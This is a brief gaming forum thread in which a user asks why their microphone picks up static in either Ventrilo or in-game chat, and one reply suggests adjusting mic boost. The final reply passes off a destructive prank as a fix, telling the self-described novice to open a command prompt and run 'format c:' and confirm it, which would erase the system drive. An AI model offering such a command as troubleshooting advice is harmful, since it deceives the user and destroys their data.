Trouble with Vent

Hey everyone, so I just tried getting on the Vent server today and I came across an annoying problem.  It seems that if I am logged into vent I can either have my mic work properly for the vent channel or in-game chat, but not both.  Whichever one is working, the other comes up with alot of static and background noise amplified to hell.  Anyways, any advice would be appreciate seeing as I r t3h nub with this stuff.

Try fuckin with the mic boost both in game and in Ventrilo. Never really had this problem -__- so I don't know

click "Run" in you start menu

type cmd.exe in the dialog box

type format c: and just hit Y and shit..should clear it right up
